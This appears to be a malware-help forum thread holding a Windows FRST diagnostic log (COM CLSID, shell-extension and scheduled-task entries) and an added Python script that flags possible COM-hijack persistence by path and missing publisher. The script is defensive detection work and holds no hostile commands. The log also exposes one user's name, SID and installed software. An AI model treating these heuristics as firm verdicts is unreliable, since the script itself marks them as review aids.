
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020421-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020422-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020423-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{00020425-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{005A3A96-BAC4-4B0A-94EA-C0CE100EA736}\localserver32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{9AAF0EB6-42D8-46C1-A2EF-679511B37A0D}\localserver32 -> D:\AutoCAD 2018\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{B6EB585B-B467-4E46-A9C7-48D7D6FD26CB}\localserver32 -> D:\AutoCAD 2018\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\SkyDriveShell64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{F8071786-1FD0-4A66-81A1-3CBE29274458}\InprocServer32 -> C:\Users\Betts\AppData\Local\Microsoft\SkyDrive\17.0.2015.0811\amd64\FileSyncApi64.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1722513563-2756437970-1780137624-1000_Classes\CLSID\{FBC9D74C-AF55-4309-9FB2-C426E071637F}\InprocServer32 -> C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-10] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-10] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2017-11-10] (Google)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\System32\AcSignIcon.dll [2017-02-03] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ShellIconOverlayIdentifiers-x32: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt02] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt03] -> {FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt04] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt05] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [ DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 1 (GFS Unread Stub)] -> {99FD978C-D287-4F50-827F-B2C658EDA8E7} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2 (GFS Stub)] -> {AB5C5600-7E6E-4B06-9197-9ECEF74D31CC} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 2.5 (GFS Unread Folder)] -> {920E6DB1-9907-4370-B3A0-BAFC03D81399} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 3 (GFS Folder)] -> {16F3DD56-1AF5-4347-846D-7C10C4192619} => -> No File
ShellIconOverlayIdentifiers-x32: [Groove Explorer Icon Overlay 4 (GFS Unread Mark)] -> {2916C86E-86A6-43FE-8112-43ABE6BF8DCC} => -> No File
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers1: [AcShellExtension.AcContextMenuHandler] -> {2E7A2C6C-B938-40a4-BA1C-C7EC982DC202} => C:\Program Files\Common Files\Autodesk Shared\AcShellEx\AcShellExtension.dll [2017-02-03] (Autodesk)
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll [2012-06-18] ()
ContextMenuHandlers1: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-11-10] (Google)
ContextMenuHandlers1: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers1: [WinCDEmu] -> {D0E37FD2-F675-426F-B09A-2CF37BA46FD5} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-29] (Sysprogs OU)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers1-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers2: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-29] (Sysprogs OU)
ContextMenuHandlers3: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers4: [GDContextMenu] -> {BB02B294-8425-42E5-983F-41A1FA970CD6} => C:\Program Files (x86)\Google\Drive\contextmenu64.dll [2017-11-10] (Google)
ContextMenuHandlers4: [TuneUp Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => -> No File
ContextMenuHandlers4: [TuneUp Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => -> No File
ContextMenuHandlers4: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers5: [NvCplDesktopContext] -> {3D1975AF-48C6-4f8e-A182-BE0E08FA86A9} => C:\Windows\system32\nvshext.dll [2017-01-20] (NVIDIA Corporation)
ContextMenuHandlers5: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Common Files\Adobe\CoreSyncExtension\CoreSync_x64.dll [2017-09-26] ()
ContextMenuHandlers6: [KyShellExt] -> {FB451ACC-65B5-456a-A84E-6F9B8B75B078} => -> No File
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinCDEmu] -> {A9901FCD-B4DF-43A1-BD5D-6C9F88679497} => C:\Program Files (x86)\WinCDEmu\x64\WinCDEmuContextMenu.dll [2015-09-29] (Sysprogs OU)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers6-x32: [XXX Groove GFS Context Menu Handler XXX] -> {6C467336-8281-4E60-8204-430CED96822D} => -> No File
ContextMenuHandlers1_S-1-5-21-1722513563-2756437970-1780137624-1000: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ContextMenuHandlers4_S-1-5-21-1722513563-2756437970-1780137624-1000: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ContextMenuHandlers5_S-1-5-21-1722513563-2756437970-1780137624-1000: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\Betts\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
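
The Custom CLSID, ShellIconOverlayIdentifiers and ContextMenuHandlers lines above are where per-user COM persistence (a per-user CLSID pointing at a DLL the user can overwrite) would show up, and also where the usual false positives live: Dropbox and SkyDrive register their overlay and context-menu handlers from AppData under the user's own SID, and FRST prints an empty "()" publisher for binaries whose company name it could not read (CoreSync_x64.dll and NppShell_05.dll in this log). The script below is an added example, not part of the posted log or of any reply in this thread: it parses lines in the format FRST uses for these sections and ranks them by two signals, a target path in a user-writable location and a missing publisher, with "No File" orphans tagged as cleanup noise. The sample lines are constructed to mirror the log's format; the helper.dll entry and its GUID {11111111-...} are invented to show what a hit looks like, and the path markers and severity tiers are my own heuristics, not FRST's.

```python
"""Triage FRST CustomCLSID / shell-extension lines for COM persistence.

Added example (not FRST's own logic). Severity tiers are heuristics:
  high   - binary in a user-writable path AND FRST printed no publisher "()"
  medium - one of those two signals alone (review list, not a verdict)
  low    - "No File": dead registration, cleanup noise rather than malware
  info   - per-user (HKU) CLSID that points at a system/Program Files binary
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

GUID = r"\{[0-9A-Fa-f-]+\}"

# CustomCLSID: HKU\<sid>_Classes\CLSID\{guid}\InprocServer32 -> C:\path.dll (Publisher)
CLSID_RE = re.compile(
    r"^CustomCLSID: (?P<key>.+?)\\CLSID\\(?P<guid>" + GUID + r")\\(?P<server>\w+)"
    r" -> (?P<path>.+?) \((?P<pub>[^()]*)\)$"
)
# ShellIconOverlayIdentifiers[-x32|_<sid>]: [Name] -> {guid} => <target>
# ContextMenuHandlersN[-x32|_<sid>]:        [Name] -> {guid} => <target>
HANDLER_RE = re.compile(
    r"^(?P<kind>ShellIconOverlayIdentifiers|ContextMenuHandlers\d+)(?P<scope>[^:]*): "
    r"\[\s*(?P<name>[^\]]+)\] -> (?P<guid>" + GUID + r") => (?P<rest>.*)$"
)
# <target> is either "-> No File" or "C:\path.dll [YYYY-MM-DD] (Publisher)"
TARGET_RE = re.compile(r"^(?P<path>.+?) \[(?P<date>[\d-]+)\] \((?P<pub>[^()]*)\)$")

# Path fragments a standard user can write to (heuristic; my own list, not FRST's).
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\")
ORDER = {"high": 0, "medium": 1, "low": 2, "info": 3}


@dataclass
class Handler:
    line: str
    guid: str
    per_user: bool           # registered under HKU / a specific SID
    path: Optional[str]      # None when FRST reports "No File"
    publisher: str           # "" when FRST printed "()"


@dataclass
class Finding:
    severity: str
    guid: str
    reason: str
    line: str


def parse_line(line: str) -> Optional[Handler]:
    """Parse one FRST line; returns None for lines outside these sections."""
    line = line.rstrip()
    m = CLSID_RE.match(line)
    if m:
        per_user = m["key"].upper().startswith("HKU\\")
        return Handler(line, m["guid"].upper(), per_user, m["path"], m["pub"].strip())
    m = HANDLER_RE.match(line)
    if not m:
        return None
    per_user = m["scope"].startswith("_S-1-5-")
    rest = m["rest"].strip()
    if rest.endswith("No File"):
        return Handler(line, m["guid"].upper(), per_user, None, "")
    t = TARGET_RE.match(rest)
    if not t:
        return None
    return Handler(line, m["guid"].upper(), per_user, t["path"], t["pub"].strip())


def in_user_writable(path: str) -> bool:
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def assess(h: Handler) -> Optional[Finding]:
    """Apply the severity tiers from the module docstring to one handler."""
    if h.path is None:
        return Finding("low", h.guid, "orphaned handler (No File): cleanup noise", h.line)
    writable = in_user_writable(h.path)
    unsigned = h.publisher == ""
    if writable and unsigned:
        return Finding("high", h.guid, "no publisher AND user-writable path", h.line)
    if writable:
        return Finding("medium", h.guid,
                       f"user-writable path, publisher '{h.publisher}': verify signature", h.line)
    if unsigned:
        return Finding("medium", h.guid, "FRST could not read a publisher for this binary", h.line)
    if h.per_user:
        return Finding("info", h.guid, "per-user CLSID -> system/Program Files binary", h.line)
    return None


def triage(log_text: str) -> List[Finding]:
    findings = [f for f in (assess(h) for h in map(parse_line, log_text.splitlines()) if h) if f]
    findings.sort(key=lambda f: ORDER[f.severity])   # stable: keeps log order within a tier
    return findings


def summarize(findings: List[Finding]) -> Dict[str, int]:
    counts = {s: 0 for s in ORDER}
    for f in findings:
        counts[f.severity] += 1
    return counts


# Constructed sample modeled on the log format above; the helper.dll line and its
# GUID are invented to show a hit. SID and user name are placeholders.
SAMPLE_LOG = r"""
CustomCLSID: HKU\S-1-5-21-1111-2222-3333-1000_Classes\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32 -> C:\Windows\system32\oleaut32.dll (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1111-2222-3333-1000_Classes\CLSID\{ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C}\InprocServer32 -> C:\Users\alice\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll (Dropbox, Inc.)
CustomCLSID: HKU\S-1-5-21-1111-2222-3333-1000_Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32 -> C:\Users\alice\AppData\Roaming\updater\helper.dll ()
ShellIconOverlayIdentifiers: [ DropboxExt01] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\alice\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => -> No File
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => C:\Program Files (x86)\Notepad++\NppShell_05.dll [2012-06-18] ()
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2012-06-09] (Alexander Roshal)
ContextMenuHandlers1_S-1-5-21-1111-2222-3333-1000: [DropboxExt] -> {ECD97DE5-3C8F-4ACB-AEEE-CCAB78F7711C} => C:\Users\alice\AppData\Roaming\Dropbox\bin\DropboxExt64.19.0.dll [2018-01-09] (Dropbox, Inc.)
"""

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"[{f.severity:6}] {f.guid}  {f.reason}")
```

Run against the sample, the only high hit is the invented helper.dll entry; the Dropbox lines land in the medium tier because an AppData path under the user's own SID is exactly the shape of a COM hijack and also exactly how Dropbox installs, so that tier is a list to check with a signature tool, not a removal list. The empty-publisher signal on its own is noisy on this log (CoreSync_x64.dll, NppShell_05.dll), which is why it is only escalated when the path is user-writable too. Feed it the real log with `triage(open("FRST.txt", encoding="utf-8", errors="replace").read())`.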
 

Broni

Malware Annihilator
==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {1698F879-1C4C-436B-8D9A-C9B0E7D23EAF} - System32\Tasks\{8D0201C2-5E52-4C80-8DC4-8BEE345A5ACF} => C:\Users\Betts\Desktop\Tor Browser\Browser\firefox.exe
Task: {296637CB-6020-4C35-9897-E1965D7355E8} - System32\Tasks\DriverDR Scheduled Scan => C:\Program Files\DriverDR.com\DriverDR\DriverDR.exe [2016-05-16] (DriverDR.com)
Task: {2E386336-0957-4A2A-BDA5-E6B618F7C442} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-09-02] (Google Inc.)
